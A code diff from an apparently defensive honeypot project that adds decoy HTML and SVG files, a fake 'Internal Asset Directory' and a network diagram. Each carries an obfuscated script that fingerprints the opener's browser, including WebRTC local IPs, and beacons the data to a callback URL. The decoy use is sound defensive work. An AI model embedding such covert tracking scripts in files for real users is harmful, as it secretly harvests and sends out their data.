ContentClass.CANARY_HONEYDOC_PDF: "/home/{persona}/Documents/Q3-Operations-Review.pdf",
|
||||||
ContentClass.CANARY_MYSQL_DUMP: "/var/backups/db_backup.sql",
|
ContentClass.CANARY_MYSQL_DUMP: "/var/backups/db_backup.sql",
|
||||||
|
ContentClass.CANARY_FINGERPRINT_HTML: "/home/{persona}/Documents/asset_directory.html",
|
||||||
|
ContentClass.CANARY_FINGERPRINT_SVG: "/home/{persona}/Documents/network_topology.svg",
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
@@ -156,7 +162,7 @@ async def cultivate(
|
|||||||
# attribute a callback if the artifact trips during the plant
|
# attribute a callback if the artifact trips during the plant
|
||||||
# itself (improbable but possible — DOCX viewers can preview
|
# itself (improbable but possible — DOCX viewers can preview
|
||||||
# autoplay-style).
|
# autoplay-style).
|
||||||
await repo.create_canary_token({
|
token_data: dict = {
|
||||||
"kind": _GENERATOR_TO_KIND.get(gen_name, "http"),
|
"kind": _GENERATOR_TO_KIND.get(gen_name, "http"),
|
||||||
"decky_name": plan.decky_name,
|
"decky_name": plan.decky_name,
|
||||||
"instrumenter": None,
|
"instrumenter": None,
|
||||||
@@ -167,7 +173,10 @@ async def cultivate(
|
|||||||
"placed_at": datetime.now(timezone.utc),
|
"placed_at": datetime.now(timezone.utc),
|
||||||
"created_by": created_by,
|
"created_by": created_by,
|
||||||
"state": "planted",
|
"state": "planted",
|
||||||
})
|
}
|
||||||
|
if artifact.fingerprint_nonce is not None:
|
||||||
|
token_data["fingerprint_nonce"] = artifact.fingerprint_nonce
|
||||||
|
await repo.create_canary_token(token_data)
|
||||||
|
|
||||||
# Carry the placement_path on the artifact so the orchestrator's
|
# Carry the placement_path on the artifact so the orchestrator's
|
||||||
# plant_file call uses it. We don't mutate the generator's
|
# plant_file call uses it. We don't mutate the generator's
|
||||||
|
|||||||
@@ -21,6 +21,8 @@ KNOWN_GENERATORS: Tuple[str, ...] = (
|
|||||||
"honeydoc_docx",
|
"honeydoc_docx",
|
||||||
"honeydoc_pdf",
|
"honeydoc_pdf",
|
||||||
"mysql_dump",
|
"mysql_dump",
|
||||||
|
"fingerprint_html",
|
||||||
|
"fingerprint_svg",
|
||||||
)
|
)
|
||||||
|
|
||||||
KNOWN_INSTRUMENTERS: Tuple[str, ...] = (
|
KNOWN_INSTRUMENTERS: Tuple[str, ...] = (
|
||||||
@@ -64,6 +66,16 @@ def get_generator(name: str) -> CanaryGenerator:
|
|||||||
if name == "mysql_dump":
|
if name == "mysql_dump":
|
||||||
from decnet.canary.generators.mysql_dump import MySQLDumpGenerator
|
from decnet.canary.generators.mysql_dump import MySQLDumpGenerator
|
||||||
return MySQLDumpGenerator()
|
return MySQLDumpGenerator()
|
||||||
|
if name == "fingerprint_html":
|
||||||
|
from decnet.canary.generators.fingerprint_html import (
|
||||||
|
FingerprintHtmlGenerator,
|
||||||
|
)
|
||||||
|
return FingerprintHtmlGenerator()
|
||||||
|
if name == "fingerprint_svg":
|
||||||
|
from decnet.canary.generators.fingerprint_svg import (
|
||||||
|
FingerprintSvgGenerator,
|
||||||
|
)
|
||||||
|
return FingerprintSvgGenerator()
|
||||||
raise ValueError(
|
raise ValueError(
|
||||||
f"Unknown canary generator: {name!r}. Known: {KNOWN_GENERATORS}"
|
f"Unknown canary generator: {name!r}. Known: {KNOWN_GENERATORS}"
|
||||||
)
|
)
|
||||||
|
|||||||
291
decnet/canary/fingerprint_payload.js
Normal file
291
decnet/canary/fingerprint_payload.js
Normal file
@@ -0,0 +1,291 @@
|
|||||||
|
// Canary fingerprint payload — the JS that runs inside an opened HTML/SVG
|
||||||
|
// canary, harvests browser primitives, and beacons the result back to the
|
||||||
|
// canary worker. Ported from canary-self-test.html with the rendering UI
|
||||||
|
// stripped out.
|
||||||
|
//
|
||||||
|
// Three placeholders are substituted by the Python builder BEFORE
|
||||||
|
// javascript-obfuscator runs:
|
||||||
|
//
|
||||||
|
// {{BEACON_URL}} → full URL to /c/<callback_token> (no trailing slash)
|
||||||
|
// {{MINT_UUID}} → per-mint UUID, baked into the string-array post-obf
|
||||||
|
// {{MINT_NONCE}} → 16-hex HMAC nonce; the worker rejects ?d=/?o= without it
|
||||||
|
//
|
||||||
|
// Beacon strategy (MVP): a bare GET pixel for "I was opened" reliability,
|
||||||
|
// then a fingerprint payload sent as a base64-URL query param on a second
|
||||||
|
// GET so the existing worker records the hit even before step-4 POST
|
||||||
|
// support lands. Both fail-open: any error short-circuits to next step.
|
||||||
|
|
||||||
|
(async function () {
|
||||||
|
var BEACON_URL = "{{BEACON_URL}}";
|
||||||
|
var MINT_UUID = "{{MINT_UUID}}";
|
||||||
|
var MINT_NONCE = "{{MINT_NONCE}}";
|
||||||
|
var fp = { mint: MINT_UUID };
|
||||||
|
|
||||||
|
function fire(url) {
|
||||||
|
try {
|
||||||
|
var img = new Image();
|
||||||
|
img.src = url;
|
||||||
|
} catch (e) { /* swallow */ }
|
||||||
|
}
|
||||||
|
|
||||||
|
// 1) bare-open beacon — fires regardless of whether the rest succeeds
|
||||||
|
fire(BEACON_URL + "?o=1&k=" + MINT_NONCE);
|
||||||
|
|
||||||
|
function sha256(str) {
|
||||||
|
var buf = new TextEncoder().encode(str);
|
||||||
|
return crypto.subtle.digest("SHA-256", buf).then(function (h) {
|
||||||
|
return Array.from(new Uint8Array(h))
|
||||||
|
.map(function (b) { return b.toString(16).padStart(2, "0"); })
|
||||||
|
.join("");
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
// navigator
|
||||||
|
try {
|
||||||
|
fp.nav = {
|
||||||
|
ua: navigator.userAgent,
|
||||||
|
pl: navigator.platform,
|
||||||
|
lg: navigator.language,
|
||||||
|
lgs: (navigator.languages || []).join(","),
|
||||||
|
ck: navigator.cookieEnabled,
|
||||||
|
dnt: navigator.doNotTrack,
|
||||||
|
hc: navigator.hardwareConcurrency,
|
||||||
|
dm: navigator.deviceMemory || null,
|
||||||
|
tp: navigator.maxTouchPoints,
|
||||||
|
wd: navigator.webdriver === true,
|
||||||
|
pdf: navigator.pdfViewerEnabled || null,
|
||||||
|
};
|
||||||
|
} catch (e) { fp.nav = { err: String(e) }; }
|
||||||
|
|
||||||
|
// screen
|
||||||
|
try {
|
||||||
|
fp.scr = {
|
||||||
|
w: screen.width, h: screen.height,
|
||||||
|
aw: screen.availWidth, ah: screen.availHeight,
|
||||||
|
cd: screen.colorDepth, pd: screen.pixelDepth,
|
||||||
|
dpr: window.devicePixelRatio,
|
||||||
|
iw: window.innerWidth, ih: window.innerHeight,
|
||||||
|
or: (screen.orientation && screen.orientation.type) || null,
|
||||||
|
};
|
||||||
|
} catch (e) { fp.scr = { err: String(e) }; }
|
||||||
|
|
||||||
|
// tz / locale
|
||||||
|
try {
|
||||||
|
var dtf = Intl.DateTimeFormat().resolvedOptions();
|
||||||
|
fp.tz = {
|
||||||
|
z: dtf.timeZone, lc: dtf.locale,
|
||||||
|
ca: dtf.calendar, ns: dtf.numberingSystem,
|
||||||
|
off: new Date().getTimezoneOffset(),
|
||||||
|
};
|
||||||
|
} catch (e) { fp.tz = { err: String(e) }; }
|
||||||
|
|
||||||
|
// connection
|
||||||
|
try {
|
||||||
|
var c = navigator.connection;
|
||||||
|
fp.cn = c ? {
|
||||||
|
t: c.effectiveType, dl: c.downlink, rtt: c.rtt, sd: c.saveData,
|
||||||
|
} : null;
|
||||||
|
} catch (e) { fp.cn = { err: String(e) }; }
|
||||||
|
|
||||||
|
// canvas
|
||||||
|
try {
|
||||||
|
var cv = document.createElement("canvas");
|
||||||
|
cv.width = 280; cv.height = 60;
|
||||||
|
var ctx = cv.getContext("2d");
|
||||||
|
ctx.textBaseline = "top";
|
||||||
|
ctx.font = "14px Arial";
|
||||||
|
ctx.fillStyle = "#f60";
|
||||||
|
ctx.fillRect(125, 1, 62, 20);
|
||||||
|
ctx.fillStyle = "#069";
|
||||||
|
ctx.fillText("c-" + String.fromCharCode(0x1f600), 2, 15);
|
||||||
|
ctx.fillStyle = "rgba(102,204,0,0.7)";
|
||||||
|
ctx.fillText("c-" + String.fromCharCode(0x1f600), 4, 17);
|
||||||
|
var dataURL = cv.toDataURL();
|
||||||
|
fp.cv = { h: await sha256(dataURL), n: dataURL.length };
|
||||||
|
} catch (e) { fp.cv = { err: String(e) }; }
|
||||||
|
|
||||||
|
// webgl
|
||||||
|
try {
|
||||||
|
var gc = document.createElement("canvas");
|
||||||
|
var gl = gc.getContext("webgl") || gc.getContext("experimental-webgl");
|
||||||
|
if (gl) {
|
||||||
|
var ext = gl.getExtension("WEBGL_debug_renderer_info");
|
||||||
|
fp.gl = {
|
||||||
|
v: gl.getParameter(gl.VENDOR),
|
||||||
|
r: gl.getParameter(gl.RENDERER),
|
||||||
|
ver: gl.getParameter(gl.VERSION),
|
||||||
|
sl: gl.getParameter(gl.SHADING_LANGUAGE_VERSION),
|
||||||
|
uv: ext ? gl.getParameter(ext.UNMASKED_VENDOR_WEBGL) : null,
|
||||||
|
ur: ext ? gl.getParameter(ext.UNMASKED_RENDERER_WEBGL) : null,
|
||||||
|
};
|
||||||
|
} else { fp.gl = { err: "unavailable" }; }
|
||||||
|
} catch (e) { fp.gl = { err: String(e) }; }
|
||||||
|
|
||||||
|
// audio
|
||||||
|
try {
|
||||||
|
var ACtx = window.OfflineAudioContext || window.webkitOfflineAudioContext;
|
||||||
|
if (ACtx) {
|
||||||
|
var actx = new ACtx(1, 44100, 44100);
|
||||||
|
var osc = actx.createOscillator();
|
||||||
|
var cmp = actx.createDynamicsCompressor();
|
||||||
|
osc.type = "triangle"; osc.frequency.value = 10000;
|
||||||
|
cmp.threshold.value = -50; cmp.knee.value = 40;
|
||||||
|
cmp.ratio.value = 12; cmp.attack.value = 0; cmp.release.value = 0.25;
|
||||||
|
osc.connect(cmp); cmp.connect(actx.destination);
|
||||||
|
osc.start(0);
|
||||||
|
var buf = await actx.startRendering();
|
||||||
|
var data = buf.getChannelData(0).slice(4500, 5000);
|
||||||
|
var sum = 0;
|
||||||
|
for (var i = 0; i < data.length; i++) sum += Math.abs(data[i]);
|
||||||
|
fp.au = { h: await sha256(sum.toString()), s: sum.toFixed(8) };
|
||||||
|
} else { fp.au = { err: "unavailable" }; }
|
||||||
|
} catch (e) { fp.au = { err: String(e) }; }
|
||||||
|
|
||||||
|
// fonts
|
||||||
|
try {
|
||||||
|
var bases = ["monospace", "sans-serif", "serif"];
|
||||||
|
var tests = [
|
||||||
|
"Arial", "Helvetica", "Times New Roman", "Courier New", "Verdana",
|
||||||
|
"Georgia", "Trebuchet MS", "Comic Sans MS", "Impact",
|
||||||
|
"Calibri", "Cambria", "Consolas", "Segoe UI", "Tahoma",
|
||||||
|
"JetBrains Mono", "Fira Code", "Cascadia Code", "SF Mono",
|
||||||
|
"Menlo", "Monaco", "Source Code Pro", "Inconsolata", "Hack",
|
||||||
|
"San Francisco", "Helvetica Neue", "Lucida Grande",
|
||||||
|
"DejaVu Sans", "DejaVu Sans Mono", "Liberation Sans",
|
||||||
|
"Liberation Mono", "Ubuntu", "Ubuntu Mono", "Roboto",
|
||||||
|
"Noto Sans", "Noto Mono",
|
||||||
|
"Microsoft YaHei", "SimSun", "PingFang SC", "Hiragino Sans",
|
||||||
|
"Hiragino Kaku Gothic Pro", "Yu Gothic", "Meiryo",
|
||||||
|
"Malgun Gothic", "Noto Sans CJK",
|
||||||
|
"Adobe Garamond Pro", "Myriad Pro", "Minion Pro",
|
||||||
|
"Bahnschrift", "Cyberpunk",
|
||||||
|
];
|
||||||
|
var sp = document.createElement("span");
|
||||||
|
sp.style.fontSize = "72px";
|
||||||
|
sp.style.position = "absolute";
|
||||||
|
sp.style.left = "-9999px";
|
||||||
|
sp.innerHTML = "mmmmmmmmmmlli";
|
||||||
|
document.body.appendChild(sp);
|
||||||
|
var bs = {};
|
||||||
|
for (var bi = 0; bi < bases.length; bi++) {
|
||||||
|
sp.style.fontFamily = bases[bi];
|
||||||
|
bs[bases[bi]] = { w: sp.offsetWidth, h: sp.offsetHeight };
|
||||||
|
}
|
||||||
|
var det = [];
|
||||||
|
for (var ti = 0; ti < tests.length; ti++) {
|
||||||
|
for (var bj = 0; bj < bases.length; bj++) {
|
||||||
|
sp.style.fontFamily = "'" + tests[ti] + "'," + bases[bj];
|
||||||
|
if (sp.offsetWidth !== bs[bases[bj]].w ||
|
||||||
|
sp.offsetHeight !== bs[bases[bj]].h) {
|
||||||
|
det.push(tests[ti]); break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
document.body.removeChild(sp);
|
||||||
|
fp.ft = {
|
||||||
|
h: await sha256(det.slice().sort().join(",")),
|
||||||
|
n: det.length, t: tests.length, d: det,
|
||||||
|
};
|
||||||
|
} catch (e) { fp.ft = { err: String(e) }; }
|
||||||
|
|
||||||
|
// webrtc local ip leak
|
||||||
|
try {
|
||||||
|
var ips = {}; var cands = [];
|
||||||
|
var RPC = window.RTCPeerConnection || window.webkitRTCPeerConnection ||
|
||||||
|
window.mozRTCPeerConnection;
|
||||||
|
if (RPC) {
|
||||||
|
var pc = new RPC({ iceServers: [{ urls: "stun:stun.l.google.com:19302" }] });
|
||||||
|
pc.createDataChannel("");
|
||||||
|
pc.onicecandidate = function (e) {
|
||||||
|
if (!e.candidate) return;
|
||||||
|
cands.push(e.candidate.candidate);
|
||||||
|
var m = e.candidate.candidate.match(
|
||||||
|
/(\d+\.\d+\.\d+\.\d+|[a-f0-9:]+::[a-f0-9:]+)/);
|
||||||
|
if (m) ips[m[1]] = 1;
|
||||||
|
};
|
||||||
|
var off = await pc.createOffer();
|
||||||
|
await pc.setLocalDescription(off);
|
||||||
|
await new Promise(function (r) { setTimeout(r, 1500); });
|
||||||
|
pc.close();
|
||||||
|
fp.rtc = { ip: Object.keys(ips), n: cands.length, c: cands.slice(0, 3) };
|
||||||
|
} else { fp.rtc = { err: "unavailable" }; }
|
||||||
|
} catch (e) { fp.rtc = { err: String(e) }; }
|
||||||
|
|
||||||
|
// battery
|
||||||
|
try {
|
||||||
|
if (navigator.getBattery) {
|
||||||
|
var bat = await navigator.getBattery();
|
||||||
|
fp.bt = {
|
||||||
|
c: bat.charging, l: bat.level,
|
||||||
|
ct: bat.chargingTime === Infinity ? "inf" : bat.chargingTime,
|
||||||
|
dt: bat.dischargingTime === Infinity ? "inf" : bat.dischargingTime,
|
||||||
|
};
|
||||||
|
} else { fp.bt = { err: "unavailable" }; }
|
||||||
|
} catch (e) { fp.bt = { err: String(e) }; }
|
||||||
|
|
||||||
|
// perf timing jitter
|
||||||
|
try {
|
||||||
|
var samples = [];
|
||||||
|
for (var pi = 0; pi < 1000; pi++) {
|
||||||
|
var pa = performance.now();
|
||||||
|
var x = 0;
|
||||||
|
for (var pj = 0; pj < 1000; pj++) x += Math.sqrt(pj);
|
||||||
|
samples.push(performance.now() - pa);
|
||||||
|
}
|
||||||
|
samples.sort(function (a, b) { return a - b; });
|
||||||
|
fp.pf = {
|
||||||
|
med: samples[500].toFixed(4),
|
||||||
|
p95: samples[950].toFixed(4),
|
||||||
|
mn: samples[0].toFixed(4),
|
||||||
|
mx: samples[999].toFixed(4),
|
||||||
|
};
|
||||||
|
} catch (e) { fp.pf = { err: String(e) }; }
|
||||||
|
|
||||||
|
// permissions
|
||||||
|
try {
|
||||||
|
if (navigator.permissions) {
|
||||||
|
var names = ["geolocation", "notifications", "camera", "microphone",
|
||||||
|
"persistent-storage", "clipboard-read", "clipboard-write"];
|
||||||
|
var st = {};
|
||||||
|
for (var ni = 0; ni < names.length; ni++) {
|
||||||
|
try {
|
||||||
|
var r = await navigator.permissions.query({ name: names[ni] });
|
||||||
|
st[names[ni]] = r.state;
|
||||||
|
} catch (e) { st[names[ni]] = "unsupported"; }
|
||||||
|
}
|
||||||
|
fp.pm = st;
|
||||||
|
} else { fp.pm = { err: "unavailable" }; }
|
||||||
|
} catch (e) { fp.pm = { err: String(e) }; }
|
||||||
|
|
||||||
|
// composite identity hash — stable inputs only
|
||||||
|
try {
|
||||||
|
var stable = [
|
||||||
|
fp.cv && fp.cv.h, fp.au && fp.au.h, fp.ft && fp.ft.h,
|
||||||
|
fp.gl && fp.gl.ur, fp.nav && fp.nav.pl,
|
||||||
|
fp.nav && fp.nav.hc, fp.tz && fp.tz.z,
|
||||||
|
fp.scr && (fp.scr.w + "x" + fp.scr.h),
|
||||||
|
].filter(Boolean).join("|");
|
||||||
|
fp.id = await sha256(stable);
|
||||||
|
} catch (e) { fp.id = { err: String(e) }; }
|
||||||
|
|
||||||
|
// 2) ship the payload as base64url JSON on a GET query param.
|
||||||
|
// The current worker records the hit on /c/<slug>; step-4 worker
|
||||||
|
// will decode ?d= and persist the fingerprint blob.
|
||||||
|
try {
|
||||||
|
var json = JSON.stringify(fp);
|
||||||
|
var b64 = btoa(unescape(encodeURIComponent(json)))
|
||||||
|
.replace(/\+/g, "-").replace(/\//g, "_").replace(/=+$/, "");
|
||||||
|
// chunk if URL would exceed safe limit (~6KB)
|
||||||
|
var MAX = 6000;
|
||||||
|
if (b64.length <= MAX) {
|
||||||
|
fire(BEACON_URL + "?d=" + b64 + "&k=" + MINT_NONCE);
|
||||||
|
} else {
|
||||||
|
var sid = (Math.random() * 1e9 | 0).toString(36);
|
||||||
|
var total = Math.ceil(b64.length / MAX);
|
||||||
|
for (var ci = 0; ci < total; ci++) {
|
||||||
|
var part = b64.substr(ci * MAX, MAX);
|
||||||
|
fire(BEACON_URL + "?s=" + sid + "&i=" + ci + "&n=" + total + "&d=" + part + "&k=" + MINT_NONCE);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
} catch (e) { /* swallow */ }
|
||||||
|
})();
|
||||||
140
decnet/canary/generators/fingerprint_html.py
Normal file
140
decnet/canary/generators/fingerprint_html.py
Normal file
@@ -0,0 +1,140 @@
|
|||||||
|
"""HTML fingerprint canary — plausible-looking page with an obfuscated
|
||||||
|
browser-fingerprinting payload inlined at the bottom of ``<body>``.
|
||||||
|
|
||||||
|
The visible content is a deliberately mundane "internal directory"
|
||||||
|
table — the kind of file a curious attacker pulls off a decky's
|
||||||
|
filesystem and opens locally to triage. When the file is opened in
|
||||||
|
*any* network-connected browser the obfuscated payload runs and beacons
|
||||||
|
to ``/c/<callback_token>``: first a bare-open pixel, then a chunked
|
||||||
|
fingerprint dump (canvas, audio, fonts, WebGL, WebRTC local IPs,
|
||||||
|
timing jitter, permissions, composite identity hash).
|
||||||
|
|
||||||
|
Determinism: the mint UUID is derived from the callback token via
|
||||||
|
:func:`uuid.uuid5` so the same ``ctx`` always produces byte-identical
|
||||||
|
output, satisfying the generator contract in :mod:`decnet.canary.base`.
|
||||||
|
The obfuscator's seed and polymorphic config bits are likewise
|
||||||
|
callback-token-derived (see :mod:`decnet.canary.obfuscator`).
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import hashlib
|
||||||
|
import uuid
|
||||||
|
|
||||||
|
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
|
||||||
|
from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
|
||||||
|
|
||||||
|
_MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
|
||||||
|
|
||||||
|
|
||||||
|
def _mint_uuid_for(callback_token: str) -> str:
|
||||||
|
return str(uuid.uuid5(_MINT_NAMESPACE, callback_token))
|
||||||
|
|
||||||
|
|
||||||
|
def _stable_int(callback_token: str, salt: str = "") -> int:
|
||||||
|
"""Deterministic non-negative int derived from the callback token.
|
||||||
|
|
||||||
|
``builtins.hash`` is salted per-process — useless for a generator
|
||||||
|
that must be byte-identical across runs. SHA-256 prefix is
|
||||||
|
overkill but free.
|
||||||
|
"""
|
||||||
|
h = hashlib.sha256((callback_token + "|" + salt).encode("utf-8")).digest()
|
||||||
|
return int.from_bytes(h[:4], "big")
|
||||||
|
|
||||||
|
|
||||||
|
_PAGE_TEMPLATE = """<!DOCTYPE html>
|
||||||
|
<html lang="en">
|
||||||
|
<head>
|
||||||
|
<meta charset="utf-8">
|
||||||
|
<title>Internal Asset Directory</title>
|
||||||
|
<style>
|
||||||
|
body{{font-family:Segoe UI,Arial,sans-serif;background:#fafafa;color:#222;
|
||||||
|
margin:24px;font-size:13px}}
|
||||||
|
h1{{font-size:18px;margin:0 0 4px 0}}
|
||||||
|
.sub{{color:#777;font-size:11px;margin-bottom:18px}}
|
||||||
|
table{{border-collapse:collapse;width:100%;background:#fff;
|
||||||
|
box-shadow:0 1px 2px rgba(0,0,0,.05)}}
|
||||||
|
th,td{{padding:6px 10px;border-bottom:1px solid #eee;text-align:left}}
|
||||||
|
th{{background:#f4f4f4;font-weight:600;font-size:11px;
|
||||||
|
text-transform:uppercase;letter-spacing:.5px;color:#555}}
|
||||||
|
tr:hover td{{background:#fafbff}}
|
||||||
|
.foot{{margin-top:16px;color:#999;font-size:11px}}
|
||||||
|
</style>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<h1>Internal Asset Directory</h1>
|
||||||
|
<div class="sub">last sync: {sync_label} · {row_count} entries · CONFIDENTIAL</div>
|
||||||
|
<table>
|
||||||
|
<tr><th>Hostname</th><th>Owner</th><th>Role</th><th>VLAN</th><th>Notes</th></tr>
|
||||||
|
{rows}
|
||||||
|
</table>
|
||||||
|
<div class="foot">page generated by directory-sync v2.4.1 — do not redistribute</div>
|
||||||
|
<script>{payload}</script>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
|
"""
|
||||||
|
|
||||||
|
|
||||||
|
_ROW_POOL = (
|
||||||
|
("ny-app-01.corp.local", "k.tanaka", "app server", "vlan20", "primary"),
|
||||||
|
("ny-db-01.corp.local", "ops", "postgres primary", "vlan30", "backup nightly"),
|
||||||
|
("ny-build-02.corp.local", "ci-bot", "jenkins agent", "vlan40", ""),
|
||||||
|
("sf-vpn-01.corp.local", "netsec", "wireguard endpoint", "vlan10", "external"),
|
||||||
|
("ldn-mail-03.corp.local", "j.weber", "exchange edge", "vlan50", ""),
|
||||||
|
("hk-cache-01.corp.local", "ops", "redis replica", "vlan30", "lag <1s"),
|
||||||
|
("br-dev-04.corp.local", "m.silva", "dev sandbox", "vlan60", "ephemeral"),
|
||||||
|
("eu-bastion-02.corp.local", "secops", "ssh jump host", "vlan10", "mfa required"),
|
||||||
|
("us-archive-01.corp.local", "compliance", "log archive", "vlan70", "retain 7y"),
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def _build_rows(callback_token: str) -> tuple[str, int]:
|
||||||
|
pick = _stable_int(callback_token, "pick") % len(_ROW_POOL)
|
||||||
|
take = 5 + (_stable_int(callback_token, "take") % 4)
|
||||||
|
selected = [_ROW_POOL[(pick + i) % len(_ROW_POOL)] for i in range(take)]
|
||||||
|
cells = "\n".join(
|
||||||
|
"<tr>" + "".join(f"<td>{c}</td>" for c in row) + "</tr>"
|
||||||
|
for row in selected
|
||||||
|
)
|
||||||
|
return cells, len(selected)
|
||||||
|
|
||||||
|
|
||||||
|
def _sync_label(callback_token: str) -> str:
|
||||||
|
day = _stable_int(callback_token, "day") % 28 + 1
|
||||||
|
hour = _stable_int(callback_token, "hour") % 24
|
||||||
|
return f"2026-04-{day:02d} {hour:02d}:14 UTC"
|
||||||
|
|
||||||
|
|
||||||
|
class FingerprintHtmlGenerator(CanaryGenerator):
|
||||||
|
"""Synthesise an HTML page that fingerprints the browser opening it."""
|
||||||
|
|
||||||
|
name = "fingerprint_html"
|
||||||
|
|
||||||
|
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
|
||||||
|
mint_uuid = _mint_uuid_for(ctx.callback_token)
|
||||||
|
nonce = nonce_for(ctx.callback_token, mint_uuid)
|
||||||
|
payload = render_fingerprint_js(
|
||||||
|
callback_token=ctx.callback_token,
|
||||||
|
http_base=ctx.http_base,
|
||||||
|
mint_uuid=mint_uuid,
|
||||||
|
nonce=nonce,
|
||||||
|
)
|
||||||
|
rows, row_count = _build_rows(ctx.callback_token)
|
||||||
|
body = _PAGE_TEMPLATE.format(
|
||||||
|
sync_label=_sync_label(ctx.callback_token),
|
||||||
|
row_count=row_count,
|
||||||
|
rows=rows,
|
||||||
|
payload=payload,
|
||||||
|
)
|
||||||
|
beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
|
||||||
|
return CanaryArtifact(
|
||||||
|
path="",
|
||||||
|
content=body.encode("utf-8"),
|
||||||
|
mode=0o644,
|
||||||
|
mtime_offset=-86400 * 14,
|
||||||
|
generator=self.name,
|
||||||
|
fingerprint_nonce=nonce,
|
||||||
|
notes=[
|
||||||
|
f"obfuscated fingerprinter beacons={beacon}",
|
||||||
|
f"mint_uuid={mint_uuid}",
|
||||||
|
],
|
||||||
|
)
|
||||||
88
decnet/canary/generators/fingerprint_svg.py
Normal file
88
decnet/canary/generators/fingerprint_svg.py
Normal file
@@ -0,0 +1,88 @@
|
|||||||
|
"""SVG fingerprint canary — standalone SVG with an embedded ``<script>``
|
||||||
|
that runs the obfuscated fingerprinter when the file is opened directly
|
||||||
|
in a browser.
|
||||||
|
|
||||||
|
SVG ``<script>`` only fires when the SVG is loaded as a top-level
|
||||||
|
document (or via ``<object>``/``<iframe>``); it's *blocked* when the
|
||||||
|
SVG is referenced from another page's ``<img>``. That's the right
|
||||||
|
posture for canary use: an attacker browsing the decky filesystem and
|
||||||
|
double-clicking a stray ``network_diagram.svg`` triggers it; rendering
|
||||||
|
inside a sandboxed CMS preview does not.
|
||||||
|
|
||||||
|
Same determinism guarantees as :mod:`fingerprint_html`.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
|
||||||
|
from decnet.canary.generators.fingerprint_html import _mint_uuid_for, _stable_int
|
||||||
|
from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
|
||||||
|
|
||||||
|
|
||||||
|
_DIAGRAM_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
|
||||||
|
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 600 360" width="600" height="360">
|
||||||
|
<style>
|
||||||
|
.box{{fill:#f7f9fb;stroke:#7a93ad;stroke-width:1.2}}
|
||||||
|
.lbl{{font:12px Segoe UI,Arial,sans-serif;fill:#2a3a4a}}
|
||||||
|
.edge{{stroke:#7a93ad;stroke-width:1.2;fill:none}}
|
||||||
|
.title{{font:bold 14px Segoe UI,Arial,sans-serif;fill:#1a2a3a}}
|
||||||
|
.cap{{font:10px Segoe UI,Arial,sans-serif;fill:#6a7a8a}}
|
||||||
|
</style>
|
||||||
|
<text class="title" x="20" y="28">Network Topology — {region} segment</text>
|
||||||
|
<text class="cap" x="20" y="44">draft v{ver} · last reviewed {review}</text>
|
||||||
|
<rect class="box" x="40" y="80" width="120" height="50" rx="4"/>
|
||||||
|
<text class="lbl" x="100" y="110" text-anchor="middle">edge gw</text>
|
||||||
|
<rect class="box" x="240" y="80" width="120" height="50" rx="4"/>
|
||||||
|
<text class="lbl" x="300" y="110" text-anchor="middle">core sw</text>
|
||||||
|
<rect class="box" x="440" y="80" width="120" height="50" rx="4"/>
|
||||||
|
<text class="lbl" x="500" y="110" text-anchor="middle">app cluster</text>
|
||||||
|
<rect class="box" x="240" y="220" width="120" height="50" rx="4"/>
|
||||||
|
<text class="lbl" x="300" y="250" text-anchor="middle">db tier</text>
|
||||||
|
<path class="edge" d="M160 105 L240 105"/>
|
||||||
|
<path class="edge" d="M360 105 L440 105"/>
|
||||||
|
<path class="edge" d="M300 130 L300 220"/>
|
||||||
|
<script type="application/ecmascript"><![CDATA[
|
||||||
|
{payload}
|
||||||
|
]]></script>
|
||||||
|
</svg>
|
||||||
|
"""
|
||||||
|
|
||||||
|
|
||||||
|
_REGIONS = ("us-east", "eu-central", "ap-south", "us-west", "sa-east")
|
||||||
|
|
||||||
|
|
||||||
|
class FingerprintSvgGenerator(CanaryGenerator):
|
||||||
|
"""Synthesise an SVG that fingerprints the browser opening it."""
|
||||||
|
|
||||||
|
name = "fingerprint_svg"
|
||||||
|
|
||||||
|
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
|
||||||
|
mint_uuid = _mint_uuid_for(ctx.callback_token)
|
||||||
|
nonce = nonce_for(ctx.callback_token, mint_uuid)
|
||||||
|
payload = render_fingerprint_js(
|
||||||
|
callback_token=ctx.callback_token,
|
||||||
|
http_base=ctx.http_base,
|
||||||
|
mint_uuid=mint_uuid,
|
||||||
|
nonce=nonce,
|
||||||
|
)
|
||||||
|
region = _REGIONS[_stable_int(ctx.callback_token, "reg") % len(_REGIONS)]
|
||||||
|
ver = 1 + (_stable_int(ctx.callback_token, "ver") % 6)
|
||||||
|
day = _stable_int(ctx.callback_token, "day") % 28 + 1
|
||||||
|
body = _DIAGRAM_TEMPLATE.format(
|
||||||
|
region=region,
|
||||||
|
ver=ver,
|
||||||
|
review=f"2026-03-{day:02d}",
|
||||||
|
payload=payload,
|
||||||
|
)
|
||||||
|
beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
|
||||||
|
return CanaryArtifact(
|
||||||
|
path="",
|
||||||
|
content=body.encode("utf-8"),
|
||||||
|
mode=0o644,
|
||||||
|
mtime_offset=-86400 * 30,
|
||||||
|
generator=self.name,
|
||||||
|
fingerprint_nonce=nonce,
|
||||||
|
notes=[
|
||||||
|
f"obfuscated fingerprinter beacons={beacon}",
|
||||||
|
f"mint_uuid={mint_uuid}",
|
||||||
|
],
|
||||||
|
)
|
||||||
177
decnet/canary/obfuscator.py
Normal file
177
decnet/canary/obfuscator.py
Normal file
@@ -0,0 +1,177 @@
|
